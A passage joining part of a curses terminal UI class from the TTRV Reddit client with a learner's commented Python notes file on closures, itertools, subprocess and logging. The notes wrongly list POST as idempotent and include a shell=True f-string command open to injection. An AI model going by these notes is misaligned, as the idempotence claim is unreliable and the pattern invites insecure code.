string = string.decode('utf-8')
string = string.encode('ascii', 'replace')
return string[:n_cols] if n_cols else string
else:
if n_cols:
string = textual_width_chop(string, n_cols)
if isinstance(string, six.text_type):
string = string.encode('utf-8')
return string
def add_line(self, window, text, row=None, col=None, attr=None):
"""
Unicode aware version of curses's built-in addnstr method.
Safely draws a line of text on the window starting at position
(row, col). Checks the boundaries of the window and cuts off the text
if it exceeds the length of the window.
"""
# The following arg combos must be supported to conform with addnstr
# (window, text)
# (window, text, attr)
# (window, text, row, col)
# (window, text, row, col, attr)
cursor_row, cursor_col = window.getyx()
row = row if row is not None else cursor_row
col = col if col is not None else cursor_col
max_rows, max_cols = window.getmaxyx()
n_cols = max_cols - col - 1
if n_cols <= 0:
# Trying to draw outside of the screen bounds
return
try:
text = self.clean(text, n_cols)
params = [] if attr is None else [attr]
window.addstr(row, col, text, *params)
except (curses.error, ValueError, TypeError) as e:
# Curses handling of strings with invalid null bytes (b'\00')
# python 2: TypeError: "int,int,str"
# python 3: ValueError: "embedded null byte"
_logger.warning('add_line raised an exception')
_logger.exception(str(e))
@staticmethod
def add_space(window):
"""
Shortcut for adding a single space to a window at the current position
"""
row, col = window.getyx()
_, max_cols = window.getmaxyx()
n_cols = max_cols - col - 1
if n_cols <= 0:
# Trying to draw outside of the screen bounds
return
window.addstr(row, col, ' ')
def show_notification(self, message, timeout=None, style='Info'):
"""
Overlay a message box on the center of the screen and wait for input.
Params:
message (list or string): List of strings, one per line.
timeout (float): Optional, maximum length of time that the message
will be shown before disappearing.
style (str): The theme element that will be applied to the
notification window
"""
assert style in ('Info', 'Warning', 'Error', 'Success')
if isinstance(message, six.string_types):
message = message.splitlines()
n_rows, n_cols = self.stdscr.getmaxyx()
v_offset, h_offset = self.stdscr.getbegyx()
box_width = max(len(m) for m in message) + 2
box_height = len(message) + 2
# Cut off the lines of the message that don't fit on the screen
box_width = min(box_width, n_cols)
box_height = min(box_height, n_rows)
message = message[:box_height - 2]
s_row = (n_rows - box_height) // 2 + v_offset
s_col = (n_cols - box_width) // 2 + h_offset
window = curses.newwin(box_height, box_width, s_row, s_col)
window.bkgd(str(' '), self.attr('Notice{0}'.format(style)))
window.erase()
window.border()
for index, line in enumerate(message, start=1):
self.add_line(window, line, index, 1)
window.refresh()
ch, start = -1, time.time()
with self.no_delay():
while timeout is None or time.time() - start < timeout:
ch = self.getch()
if ch != -1:
break
time.sleep(0.01)
window.clear()
del window
self.stdscr.touchwin()
self.stdscr.refresh()
return ch
def prompt_user_to_select_link(self, links):
"""
Prompt the user to select a link from a list to open.
Return the link that was selected, or ``None`` if no link was selected.
"""
link_pages = self.get_link_pages(links)
n = 0
while n in range(len(link_pages)):
link_page = link_pages[n]
text = 'Select a link to open (page {} of {}):\n\n'
text = text.format(n+1, len(link_pages))
text += self.get_link_page_text(link_page)
if link_page is not link_pages[-1]:
text += '[j] next page...'
if link_page is not link_pages[0]:
if link_page is not link_pages[-1]:
text += '\n'
text += '[k] ...previous page'
try:
choice = chr(self.show_notification(text))
try:
choice = int(choice)
except ValueError:
pass
except ValueError:
return None
if choice == 'j':
if link_page is not link_pages[-1]:
n += 1
continue
elif choice == 'k':
if link_page is not link_pages[0]:
n -= 1
continue
elif choice not in range(len(link_page)):
return None
return link_page[choice]['href']
@staticmethod
def get_link_pages(links):
"""
Given a list of links, separate them into pages that can be displayed
to the user and navigated using the 1-9 and 0 number keys.
"""
link_pages = []
i = 0
while i < len(links):
link_page = []
while i < len(links) and len(link_page) < 10:
link_page.append(links[i])
i += 1
link_pages.append(link_page)
return link_pages
@staticmethod
def get_link_page_text(link_page):
"""
Construct the dialog box to display a list of links to the user.
"""
text = ''
for i, link in enumerate(link_page):
capped_link_text = (link['text'] if len(link['text']) <= 20
else link['text'][:19] + '…')
text += '[{}] [{}]({})\n'.format(i, capped_link_text, link['href'])
return text
def open_link(self, url):
"""
Open a media link using the definitions from the user's mailcap file.
Most urls are parsed using their file extension, but special cases
exist for websites that are prevalent on reddit such as Imgur and
Gfycat. If there are no valid mailcap definitions, TTRV will fall back
to using the default webbrowser.
TTRV checks for certain mailcap fields to determine how to open a link:
- If ``copiousoutput`` is specified, the curses application will
be paused and stdout will be piped to the system pager.
- If `needsterminal`` is specified, the curses application will
yield terminal control to the subprocess until it has exited.
- Otherwise, we assume that the subprocess is meant to open a new
x-window, and we swallow all stdout output.
Examples:
Stream youtube videos with VLC
Browse images and imgur albums with feh
Watch .webm videos through your terminal with mplayer
View images directly in your terminal with fbi or w3m
Play .mp3 files with sox player
Send HTML pages your pager using to html2text
...anything is possible!
"""
if not self.config['enable_media']:
self.open_browser(url)
return
try:
with self.loader('Checking link', catch_exception=False):
command, entry = self.get_mailcap_entry(url)
except exceptions.MailcapEntryNotFound:
self.open_browser(url)
return
_logger.info('Executing command: %s', command)
needs_terminal = 'needsterminal' in entry
copious_output = 'copiousoutput' in entry
if needs_terminal or copious_output:
# Blocking, pause ttrv until the process returns
with self.suspend():
os.system('clear')
p = subprocess.Popen(
[command], stderr=subprocess.PIPE,
universal_newlines=True, shell=True)
_, stderr = p.communicate()
if copious_output:
six.moves.input('Press any key to continue')
code = p.poll()
if code != 0:
_logger.warning(stderr)
self.show_notification(
'Program exited with status={0}\n{1}'.format(
code, stderr.strip()), style='Error')
else:
# Non-blocking, open a background process
with self.loader('Opening page', delay=0):
p = subprocess.Popen(
[command], shell=True, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Wait a little while to make sure that the command doesn't
# exit with an error. This isn't perfect, but it should be good
# enough to catch invalid commands.
time.sleep(1.0)
code = p.poll()
if code is not None and code != 0:
_, stderr = p.communicate()
raise exceptions.BrowserError(
'Program exited with status={0}\n{1}'.format(
code, stderr.strip()))
# Spin off a thread with p.communicate() to avoid subprocess
# hang when the stodout/stderr PIPE gets filled up. This
# behavior was discovered when opening long gifs with mpv
# because mpv sends a progress bar to stderr.
# https://thraxil.org/users/anders/posts/2008/03/13/
threading.Thread(target=p.communicate).start()
def get_mailcap_entry(self, url):
"""
Search through the mime handlers list and attempt to find the
appropriate command to open the provided url with.
Will raise a MailcapEntryNotFound exception if no valid command exists.
Params:
url (text): URL that will be checked
Returns:
command (text): The string of the command that should be executed
in a subprocess to open the resource.
entry (dict): The full mailcap entry for the corresponding command
"""
for parser in mime_parsers.parsers:
if parser.pattern.match(url):
# modified_url may be the same as the original url, but it
# could also be updated to point to a different page, or it
# could refer to the location of a temporary file with the
# page's downloaded content.
try:
modified_url, content_type = parser.get_mimetype(url)
except Exception as e:
# If Imgur decides to change its html layout, let it fail
# silently in the background instead of crashing.
_logger.warning('parser %s raised an exception', parser)
_logger.exception(e)
raise exceptions.MailcapEntryNotFound()
if not content_type:
_logger.info('Content type could not be determined')
raise exceptions.MailcapEntryNotFound()
elif content_type == 'text/html':
_logger.info('Content type text/html, deferring to browser')
raise exceptions.MailcapEntryNotFound()
command, entry = mailcap.findmatch(
self._mailcap_dict, content_type, filename=modified_url)
if not entry:
_logger.info('Could not find a valid mailcap entry')
raise exceptions.MailcapEntryNotFound()
return command, entry
# No parsers matched the url
raise exceptions.MailcapEntryNotFound()
def open_browser(self, url):
"""
Open the given url using the default webbrowser. The preferred browser
can specified with the $BROWSER environment variable. If not specified,
python webbrowser will try to determine the default to use based on
your system.
For browsers requiring an X display, we open a new subprocess and
redirect stdout/stderr to devnull. This is a workaround to stop
BackgroundBrowsers (e.g. xdg-open, any BROWSER command ending in "&"),
from spewing warning messages to the console. See
http://bugs.python.org/issue22277 for a better description of the
problem.
For console browsers (e.g. w3m), TTRV will suspend and display the
browser window within the same terminal. This mode is triggered either
when
1. $BROWSER is set to a known console browser, or
2. $DISPLAY is undefined, indicating that the terminal is running
headless
There may be other cases where console browsers are opened (xdg-open?)
but are not detected here. These cases are still unhandled and will
probably be broken if we incorrectly assume that self.display=True.
"""
if self.display:
with self.loader('Opening page in a new window'):
def open_url_silent(url):
# This used to be done using subprocess.Popen().
# It was switched to multiprocessing.Process so that we
# can re-use the webbrowser instance that has been patched
# by TTRV. It's also safer because it doesn't inject
# python code through the command line.
# Suppress stdout/stderr from the browser, see
# https://stackoverflow.com/questions/2323080. We can't
# depend on replacing sys.stdout & sys.stderr because
# webbrowser uses Popen().
stdout, stderr = os.dup(1), os.dup(2)
null = os.open(os.devnull, os.O_RDWR)
try:
os.dup2(null, 1)
os.dup2(null, 2)
if self.config['force_new_browser_window']:
webbrowser.open_new(url)
else:
webbrowser.open_new_tab(url)
finally:
try:
os.close(null)
except OSError:
pass
os.dup2(stdout, 1)
os.dup2(stderr, 2)
p = Process(target=open_url_silent, args=(url,))
p.start()
# Give the browser 7 seconds to open a new tab. Because the
# display is set, calling webbrowser should be non-blocking.
# If it blocks or returns an error, something went wrong.
try:
p.join(7)
if p.is_alive():
raise exceptions.BrowserError(
'Timeout waiting for browser to open')
finally:
# This will be hit on the browser timeout, but also if the
# user presses the ESC key. We always want to kill the
# webbrowser process if it hasn't opened the tab and
# terminated by now.
try:
p.terminate()
except OSError:
pass
else:
with self.suspend():
if self.config['force_new_browser_window']:
webbrowser.open_new(url)
else:
webbrowser.open_new_tab(url)
def open_pager(self, data, wrap=None):
"""
View a long block of text using an external pager / viewer. The setting
of the TTRV_PAGER variable will be used if set, otherwise the system's
default pager is chosen, finally defaulting to 'less' if both TTRV_PAGER
and PAGER is unset in the calling environment.
The data string will be piped directly to the pager.
"""
pager = os.getenv('TTRV_PAGER')
if pager is None:
pager = os.getenv('PAGER') or 'less'
command = shlex.split(pager)
if wrap:
data_lines = content.Content.wrap_text(data, wrap)
data = '\n'.join(data_lines)
try:
with self.suspend():
_logger.debug('Running command: %s', command)
p = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
p.communicate(data.encode('utf-8'))
except KeyboardInterrupt:
p.terminate()
except OSError as e:
_logger.exception(e)
self.show_notification('Could not open pager %s' % pager)
@contextmanager
def open_editor(self, data=''):
"""
Open a file for editing using the system's default editor.
After the file has been altered, the text will be read back and the
HTML comment tag <!--INSRUCTIONS --> will be stripped. If an error
occurs inside of the context manager, the file will be preserved so
users can recover their data. Otherwise, the file will be deleted when
the context manager closes.
Params:
data (str): If provided, text will be written to the file before
opening it with the editor.
Returns:
text (str): The text that the user entered into the editor.
"""
with NamedTemporaryFile(prefix='ttrv_', suffix='.txt', delete=False) as fp:
# Create a tempory file and grab the name, but close immediately so
# we can re-open using the right encoding
filepath = fp.name
with codecs.open(filepath, 'w', 'utf-8') as fp:
fp.write(data)
_logger.info('File created: %s', filepath)
editor = (os.getenv('TTRV_EDITOR') or
os.getenv('VISUAL') or
os.getenv('EDITOR') or
'nano')
command = shlex.split(editor) + [filepath]
try:
with self.suspend():
_logger.debug('Running command: %s', command)
p = subprocess.Popen(command)
try:
p.communicate()
except KeyboardInterrupt:
p.terminate()
except OSError as e:
_logger.exception(e)
self.show_notification('Could not open file with %s' % editor)
with codecs.open(filepath, 'r', 'utf-8') as fp:
text = fp.read()
text = self.strip_instructions(text)
try:
yield text
except exceptions.TemporaryFileError:
# All exceptions will cause the file to *not* be removed, but these
# ones should also be swallowed
_logger.info('Caught TemporaryFileError')
self.show_notification('Post saved as: %s' % filepath)
else:
# If no errors occurred, try to remove the file
try:
os.remove(filepath)
except OSError:
_logger.warning('Could not delete: %s', filepath)
else:
_logger.info('File deleted: %s', filepath)
def open_urlview(self, data):
"""
Pipe a block of text to urlview, which displays a list of urls
contained in the text and allows the user to open them with their
web browser.
"""
urlview = os.getenv('TTRV_URLVIEWER') or 'urlview'
command = shlex.split(urlview)
try:
with self.suspend():
_logger.debug('Running command: %s', command)
p = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
p.communicate(input=data.encode('utf-8'))
except KeyboardInterrupt:
p.terminate()
code = p.poll()
if code == 1:
# Clear the "No URLs found." message from stdout
sys.stdout.write("\033[F")
sys.stdout.flush()
if code == 1:
self.show_notification('No URLs found')
except OSError as e:
_logger.exception(e)
self.show_notification(
'Failed to open {0}'.format(urlview))
def text_input(self, window, allow_resize=False):
"""
Transform a window into a text box that will accept user input and loop
until an escape sequence is entered.
If the escape key (27) is pressed, cancel the textbox and return None.
Otherwise, the textbox will wait until it is full (^j, or a new line is
entered on the bottom line) or the BEL key (^g) is pressed.
"""
window.clear()
# Set cursor mode to 1 because 2 doesn't display on some terminals
self.curs_set(1)
# Keep insert_mode off to avoid the recursion error described here
# http://bugs.python.org/issue13051
textbox = textpad.Textbox(window)
textbox.stripspaces = 0
def validate(ch):
"Filters characters for special key sequences"
if ch == self.ESCAPE:
raise exceptions.EscapeInterrupt()
if (not allow_resize) and (ch == curses.KEY_RESIZE):
raise exceptions.EscapeInterrupt()
# Fix backspace for iterm
if ch == curses.ascii.DEL:
ch = curses.KEY_BACKSPACE
return ch
# Wrapping in an exception block so that we can distinguish when the
# user hits the return character from when the user tries to back out
# of the input.
try:
out = textbox.edit(validate=validate)
if isinstance(out, six.binary_type):
out = out.decode('utf-8')
except exceptions.EscapeInterrupt:
out = None
self.curs_set(0)
return self.strip_textpad(out)
def prompt_input(self, prompt, key=False):
"""
Display a text prompt at the bottom of the screen.
Params:
prompt (string): Text prompt that will be displayed
key (bool): If true, grab a single keystroke instead of a full
string. This can be faster than pressing enter for
single key prompts (e.g. y/n?)
"""
n_rows, n_cols = self.stdscr.getmaxyx()
v_offset, h_offset = self.stdscr.getbegyx()
ch, attr = str(' '), self.attr('Prompt')
prompt = self.clean(prompt, n_cols - 1)
# Create a new window to draw the text at the bottom of the screen,
# so we can erase it when we're done.
s_row = v_offset + n_rows - 1
s_col = h_offset
prompt_win = curses.newwin(1, len(prompt) + 1, s_row, s_col)
prompt_win.bkgd(ch, attr)
self.add_line(prompt_win, prompt)
prompt_win.refresh()
# Create a separate window for text input
s_col = h_offset + len(prompt)
input_win = curses.newwin(1, n_cols - len(prompt), s_row, s_col)
input_win.bkgd(ch, attr)
input_win.refresh()
if key:
self.curs_set(1)
ch = self.getch()
# We can't convert the character to unicode, because it may return
# Invalid values for keys that don't map to unicode characters,
# e.g. F1
text = ch if ch != self.ESCAPE else None
self.curs_set(0)
else:
text = self.text_input(input_win)
prompt_win.clear()
input_win.clear()
del prompt_win
del input_win
self.stdscr.touchwin()
self.stdscr.refresh()
return text
def prompt_y_or_n(self, prompt):
"""
Wrapper around prompt_input for simple yes/no queries.
"""
ch = self.prompt_input(prompt, key=True)
if ch in (ord('Y'), ord('y')):
return True
elif ch in (ord('N'), ord('n'), None):
return False
else:
self.flash()
return False
@staticmethod
def strip_textpad(text):
"""
Attempt to intelligently strip excess whitespace from the output of a
curses textpad.
"""
if text is None:
return text
# Trivial case where the textbox is only one line long.
if '\n' not in text:
return text.rstrip()
# Allow one space at the end of the line. If there is more than one
# space, assume that a newline operation was intended by the user
stack, current_line = [], ''
for line in text.split('\n'):
if line.endswith(' ') or not line:
stack.append(current_line + line.rstrip())
current_line = ''
else:
current_line += line
stack.append(current_line)
# Prune empty lines at the bottom of the textbox.
for item in stack[::-1]:
if not item:
stack.pop()
else:
break
out = '\n'.join(stack)
return out
@staticmethod
def strip_instructions(text):
"""
Remove instructional HTML comment tags inserted by TTRV.
We used to use # to annotate comments, but it conflicted with the
header tag for markdown, which some people use to format their posts.
"""
# Pattern can span multiple lines, allows dot to match newline chars
flags = re.MULTILINE | re.DOTALL
pattern = '<!--{token}(.*?){token}-->'.format(token=TOKEN)
text = re.sub(pattern, '', text, flags=flags)
return re.sub(r'\A[\s\n]*\n', '', text, flags=flags).rstrip()
def clear_screen(self):
"""
In the beginning this always called touchwin(). However, a bug
was discovered in tmux when TERM was set to `xterm-256color`, where
only part of the screen got redrawn when scrolling. tmux automatically
sets TERM to `screen-256color`, but many people choose to override
this in their tmux.conf or .bashrc file which can cause issues.
Using clearok() instead seems to fix the problem, with the trade off
of slightly more expensive screen refreshes.
Update: It was discovered that using clearok() introduced a
separate bug for urxvt users in which their screen flashed when
scrolling. Heuristics were added to make it work with as many
configurations as possible. It's still not perfect
(e.g. urxvt + xterm-256color) will screen flash, but it should
work in all cases if the user sets their TERM correctly.
Reference:
https://github.com/tildeclub/ttrv/issues/343
https://github.com/tildeclub/ttrv/issues/323
"""
if self._term != 'xterm-256color':
self.stdscr.touchwin()
else:
self.stdscr.clearok(True)
def attr(self, element):
"""
Shortcut for fetching the color + attribute code for an element.
"""
# The theme must be initialized before calling this
assert self.theme is not None
return self.theme.get(element)
@staticmethod
def check_theme(theme):
"""
Check if the given theme is compatible with the terminal
"""
terminal_colors = curses.COLORS if curses.has_colors() else 0
if theme.required_colors > terminal_colors:
return False
elif theme.required_color_pairs > curses.COLOR_PAIRS:
return False
else:
return True
def set_theme(self, theme=None):
"""
Check that the terminal supports the provided theme, and applies
the theme to the terminal if possible.
If the terminal doesn't support the theme, this falls back to the
default theme. The default theme only requires 8 colors so it
should be compatible with any terminal that supports basic colors.
"""
terminal_colors = curses.COLORS if curses.has_colors() else 0
default_theme = Theme(use_color=bool(terminal_colors))
if theme is None:
theme = default_theme
elif theme.required_color_pairs > curses.COLOR_PAIRS:
_logger.warning(
'Theme `%s` requires %s color pairs, but $TERM=%s only '
'supports %s color pairs, switching to default theme',
theme.name, theme.required_color_pairs, self._term,
curses.COLOR_PAIRS)
theme = default_theme
elif theme.required_colors > terminal_colors:
_logger.warning(
'Theme `%s` requires %s colors, but $TERM=%s only '
'supports %s colors, switching to default theme',
theme.name, theme.required_colors, self._term,
curses.COLORS)
theme = default_theme
theme.bind_curses()
self.theme = theme
# Apply the default color to the whole screen
self.stdscr.bkgd(str(' '), self.attr('Normal'))
|
concepts_and_terms.py
|
"""
Time stuff
"""
# import time
#
# t1 = time.perf_counter_ns()
# # do things
# t2 = time.perf_counter_ns()
# print(t2 - t1)
"""
Idempotence
f(f(x)) = f(x)
Whenever you do something over and over again, you get the same result.
GET
PUT
POST
DELETE
Are always Idempotent
POST is NOT Idempotent (The response can change on multiple tries)
"""
#
# print(abs(abs(-10))) # Will always be 10
#
"""
Closures
"A closure is an inner function that remembers and has access to variables in
the local scope in which it was created.
"""
# def closure():
# count = 0
#
# def inner():
# nonlocal count
# count += 1
# print(count)
#
# return inner
#
#
# start = closure()
# start()
# start()
# start()
#
"""
Memoization: storing the result of a function so it does not need to be re-run
if the same inputs are seen again.
"""
# import time
#
# ef_cache = {}
#
#
# def expensive_func(num):
# if num in ef_cache:
# return ef_cache[num]
#
# print(f"Computing {num}")
# time.sleep(1)
# result = num * num
# ef_cache[num] = result
# return num * num
#
#
# result = expensive_func(4)
# print(result)
#
# result = expensive_func(10)
# print(result)
#
# result = expensive_func(4)
# print(result)
#
# result = expensive_func(10)
# print(result)
#
"""
Ternary Conditional
"""
# # condition = False
# # x = 1 if condition else 0
#
"""
formatting large numbers.
2_000_000 # Adding underscores does not affect numbers in Python!
"""
# num1 = 10_000_000_000
# num2 = 100_000_000
# total = num1 + num2
#
# print(f"{total:,}")
#
"""
iterate over two lists at once!
"""
# names = [""]
#
#
# def fibonacci_generator(num):
# a, b = 0, 1
# for i in range(0, num):
# yield a
# a, b = b, a + b
#
#
# fib_gen = fibonacci_generator(10)
#
#
# def test_fibonacci_generator(fib_gen):
# first_ten = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]
# for fib, num in zip(fib_gen, first_ten):
# assert fib == num
#
#
"""
Tuple unpacking
"""
# # set 'a' and 'b' to 1, 2 and c to everything up to the last one [3, 4] d to 5
# a, b, *c, d = (1, 2, 3, 4, 5)
# print(a, b, c, d)
# # Ignore the rest of the arguments completely
# a, b, *_ = (1, 2, 3, 4, 5)
# print(a, b, c, d)
#
"""
Being 'Pythonic'... EAFP (Easier to ask forgiveness than permission)
'Let's try to do something and if it doesn't work, we will handle it.
vs
Look before you leap (LBYL)
'ask permission every step you take.'
Python can be a lot faster in situations where you don't expect a lot of errors
because you don't have to keep accessing the object to ask it questions before
proceeding.
"""
#
#
class Person:
def quack(self):
print("Quack, quack!")
def walk(self):
print("Waddle, Waddle!")
class Duck:
def quack(self):
print("Quack, quack!")
def walk(self):
print("Waddle, Waddle!")
# Pythonic
def is_a_duck_pythonic(thing):
try:
thing.quack()
thing.walk()
print("I think this is a Duck!")
except AttributeError as e:
print(e)
print("I don't think this is a duck!")
#
#
# # Non-Pythonic
def is_a_duck(thing):
if hasattr(thing, "quack"):
if callable(thing.quack):
thing.quack()
if hasattr(thing, "walk"):
if callable(thing.walk):
thing.walk()
print("I think this is a Duck!")
#
# else:
# print("I don't think this is a duck!")
#
#
"""
How being more Pythonic can avoid race conditions
"""
# import os
#
# my_file = "file.txt"
#
# if os.access(my_file, os.R_OK):
# # Race condition could happen here if something happens to the file before
# # Python is able to open it.
# with open(my_file) as f:
# print(f.read())
# else:
# print("File could not be accessed")
#
# # Non-Race condition
# try:
# f = open(my_file)
# except IOError as e:
# print("File could not be accessed")
# else:
# with f:
# print(f.read())
"""
Async Tasks
"""
# import time
# import asyncio
# def print_something(something):
# time.sleep(0.1)
# print(something)
#
#
# async def print_something_2(something):
# time.sleep(0.1)
# print(something)
#
#
# async def main(loop):
# colors = [
# "Black",
# "Yellow",
# "Green",
# "Red",
# "Blue",
# "Beige",
# "Orange",
# "Burgundy",
# "Pink",
# "Brown",
# ]
# for color in colors:
# loop.create_task(print_something_2(color))
#
# # await asyncio.wait()
#
#
# START_TIME = time.clock()
# LOOP = asyncio.get_event_loop()
# try:
# LOOP.run_until_complete(main(LOOP))
# except Exception as e:
# pass
# finally:
# LOOP.close()
# print(f"I took {time.clock() - START_TIME} seconds to complete")
"""
Multiprocessing
"""
# import time
# from multiprocessing import Process, Queue, Pool, cpu_count
# import time
# def print_something(something):
# time.sleep(1)
# print(something)
#
#
# def multiprocess_list(items):
# processes = []
#
# for item in items:
# proc = Process(target=print_something, args=(item,))
# processes.append(proc)
# proc.start()
#
# for proc in processes:
# proc.join()
#
#
# def multiprocess_tasks(tasks, number_of_processes):
# tasks_to_accomplish = Queue()
# processes = []
#
# for task in tasks:
# tasks_to_accomplish.put(task)
#
# for i in range(number_of_processes):
# while not tasks_to_accomplish.empty():
# p = Process(target=print_something, args=(tasks_to_accomplish.get(),))
# processes.append(p)
# p.start()
#
# for p in processes:
# p.join()
#
#
# def pool_tasks(tasks, number_of_processes):
# p = Pool(number_of_processes)
# p.map(print_something, tasks)
#
#
# COLORS = [
# "Black",
# "Yellow",
# "Green",
# "Red",
# "Blue",
# "Beige",
# "Orange",
# "Burgundy",
# "Pink",
# "Brown",
# ]
#
# START_TIME = time.time()
# for COLOR in COLORS:
# print_something(COLOR)
# # Method 1
# multiprocess_list(COLORS) # 1.5 seconds
#
# # Method 2
# multiprocess_tasks(COLORS, cpu_count()) # 1.67 seconds
#
# # Method 3
# pool_tasks(COLORS, cpu_count()) # 3.2 seconds
#
# # No multiprocessing 10 seconds
# for COLOR in COLORS:
# print_something(COLOR)
#
# print(f"I took {time.time() - START_TIME} seconds to complete")
"""
Python Logging
"""
# import logging
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.DEBUG) # stream_handler will use this level
#
# formatter = logging.Formatter("%(asctime)s:%(levelname)s:%(name)s:%(message)s")
#
# file_handler = logging.FileHandler("sample.log")
# file_handler.setLevel(logging.ERROR) # Only write ERRORS to the sample.log
# file_handler.setFormatter(formatter)
#
# stream_handler = logging.StreamHandler()
# stream_handler.setFormatter(formatter)
#
# logger.addHandler(file_handler)
# logger.addHandler(stream_handler)
#
#
# def divide(x, y):
# try:
# return x / y
# except ZeroDivisionError:
# logger.exception("Tried to divide by zero")
#
#
# num_1 = 20
# num_2 = 0
#
# divide_result = divide(20, 0)
# logger.debug(f"Divide: {num_1} + {num_2} = {divide_result}")
"""
What is an iterable, iterator, and a generator? Oh My!
Q: Is a List an iterator?
A: It is iterable, but it is NOT an iterator.
Q: So what does it mean that something is 'iterable?'
A: Something that is iterable is something that can be 'looped' over. These include strings, lists, dictionaries,
tuples, files, generators, etc. The object needs to be able to return an interator object from its dunder __iter__
method. The iterator object returned must define a __next__ method.
Q: How do we know that something is iterable?
A: It needs to have dunder (magic) method __iter__
A: When you are using a for loop over an object, you are calling its __iter__ method.
Q: So what is an iterator?
A: An iterator is an object with a state so that it remembers where it is during iteration.
Q: How does an iterator get its next value?
A: An iterator gets its next value though the __next__ method
A: One of the reasons a list is not an iterator is that it does not have a __next__ method.
Q: What's the difference between a function and a generator?
A: A generator yields values whereas a function returns values. A generator also maintains state.
"""
# tmp_list = [1, 2, 3]
# iter_list = tmp_list.__iter__()
# iter_list_2 = iter(tmp_list)
# assert type(iter_list) == type(iter_list_2) # Both are iterators
#
# # Custom implementation of a for loop
# tmp_list = [1, 2, 3]
# iter_list = iter(tmp_list)
# while True:
# try:
# item = next(iter_list)
# print(item)
# except StopIteration:
# break
#
# # Custom implementation of the range() function using a generator
# class MyRange:
# def __init__(self, start, end):
# self.value = start
# self.end = end
#
# def __iter__(self):
# return self
#
# def __next__(self):
# if self.value >= self.end:
# raise StopIteration
# current = self.value
# self.value += 1
# return current
#
# nums = MyRange(1, 10)
# for num in nums:
# print(num)
#
# nums_2 = MyRange(1, 10)
# print(next(nums_2))
# print(next(nums_2))
# print(next(nums_2))
# print(next(nums_2))
# def my_range(start, end):
# current = start
# while current < end:
# yield current
# current += 1
#
#
# nums = my_range(1, 10)
# for i in range(9):
# print(next(nums))
"""
Intertools
"""
# # Counter
# import itertools
# counter = itertools.count(start=1, step=1)
#
# data = ["Mark", "Ashley", "Christine", "John", "Holiday"]
# combined = list(
# zip(counter, data)
# ) # zip pairs iterables together, limited by the shortest one.
# print(combined)
# # Cycle
# cycle_counter = itertools.cycle(("On", "Off")) # Good for simulating a switch. Takes a tuple and repeats it.
# for _ in range(6):
# print(next(cycle_counter))
# # Repeat
# squares = map(pow, range(10), itertools.repeat(2)) # pow(2, 2) == 2^2
# print(list(squares))
# # Starmap
# squares = itertools.starmap(
# pow, [(0, 2), (1, 2), (2, 2)]
# ) # like map(), but takes sets of tuples
# print(list(squares))
# # Combinations and Permutations
# # With combinations, order does not matter, in permutations, they do.
# import time
# letters = ["a", "b", "c"]
# numbers = [1, 2, 3]
# names = ["John", "Ashley"]
# combinations = itertools.combinations(letters, 2)
# permutations = itertools.permutations(letters, 2)
# itertools.combinations(letters, 2)
# itertools.permutations(letters, 2)
# list_generator = itertools.chain(letters, numbers, names)
# # islice
# test_gen = (a for a in range(101))
# slice_of_generator = itertools.islice(
# test_gen, 90, 101, 2
# ) # (iterator, start, stop, step)
# print(list(slice_of_generator)) # [90, 92, 94, 96, 98, 100]
# # Filtering and Compression
# import string
#
#
# def lt_2(n):
# if n < 2:
# return True
# return False
#
#
# alphabet_list = list(string.ascii_lowercase)
# numbers = range(10)
# names = ["Solly", "Holiday"]
#
# selectors = itertools.cycle((True, False))
#
# filter_result = filter(lt_2, numbers)
# print(list(filter_result)) # [0, 1]
#
# flip_filter_result = itertools.filterfalse(lt_2, numbers)
# print(list(flip_filter_result)) # [2, 3, 4, 5, 6, 7, 8, 9]
#
# compression_result = itertools.compress(alphabet_list, selectors)
# print(
# list(compression_result)
# ) # ['a', 'c', 'e', 'g', 'i', 'k', 'm', 'o', 'q', 's', 'u', 'w', 'y']
#
# drop_until_true = itertools.dropwhile(
# lt_2, numbers
# ) # filter the nums until you reach a True, then return the rest
# print(list(drop_until_true)) # [2, 3, 4, 5, 6, 7, 8, 9]
#
# take_while_true = itertools.takewhile(
# lt_2, numbers
# ) # return nums until False, then yeet the F out.
# print(list(take_while_true)) # [0, 1]
# # Accumulate
# numbers = range(10)
# acc_result = itertools.accumulate(numbers) # add each num to the next one
# print(list(acc_result)) # [0, 1, 3, 6, 10, 15, 21, 28, 36, 45]
# # Groupby (REQUIRES ITERABLE TO ALREADY BE SORTED!!!!)
# def get_state(person):
# return person["state"]
#
#
# people = [
# {"name": "John Doe", "city": "Gotham", "state": "NY"},
# {"name": "Jane Doe", "city": "Kings Landing", "state": "NY"},
# {"name": "Corey Schafer", "city": "Boulder", "state": "CO"},
# {"name": "Al Einstein", "city": "Denver", "state": "CO"},
# {"name": "John Henry", "city": "Hinton", "state": "WV"},
# {"name": "Randy Moss", "city": "Rand", "state": "WV"},
# {"name": "Nicole K", "city": "Asheville", "state": "NC"},
# {"name": "Jim Doe", "city": "Charlotte", "state": "NC"},
# {"name": "Jane Taylor", "city": "Faketown", "state": "NC"},
# ]
#
# person_group = itertools.groupby(people, get_state)
# for key, group in person_group:
# print(key)
# for person in group:
# print(person)
# copy1, copy2 = itertools.tee(person_group) # create two copies of an iterator
"""
Calling external programs in Python
"""
# import subprocess
# subprocess.run("ls") # single command
# subprocess.run(
# "ls -la", shell=True
# ) # You can use shell=True if running more than one command..but this is not safe
# subprocess.run(["ls", "-la"]) # passing in commands with a list is safer.
#
# # capture output
# output = subprocess.run(
# ["ls", "-la"], capture_output=True, text=True
# ) # text=true returns a string instead of bytes
# print(output)
# # redirecting output to a file
# with open("output.txt", "w") as writer_obj:
# output = subprocess.run(
# ["ls", "-la"], stdout=writer_obj, text=True, check=True
# ) # check=true throws an error in Python if it fails
# # Error handling
# output = subprocess.run(["ls", "-la", "blablah"], capture_output=True, text=True)
# if output.returncode != 0: # There was an error
# print(output.stderr)
# else:
# with open("output.txt", "w") as writer_obj:
# writer_obj.write(output)
# # Re-direct output to the void
# subprocess.run(["ls", "-la", "blablah"], stderr=subprocess.DEVNULL)
# # Pipe commands | !
# def get_file_line_count_bash(file_path):
# line_count = subprocess.run(
# [f"cat {file_path} | wc -l"], capture_output=True, text=True, shell=True
# )
# return int(line_count.stdout.strip())
"""
requests with HTTPbin
"""
# import requests
#
# # GET
# payload = {"page": 2, "count": 25}
# r = requests.get("https://httpbin.org/get", params=payload)
#
# # POST
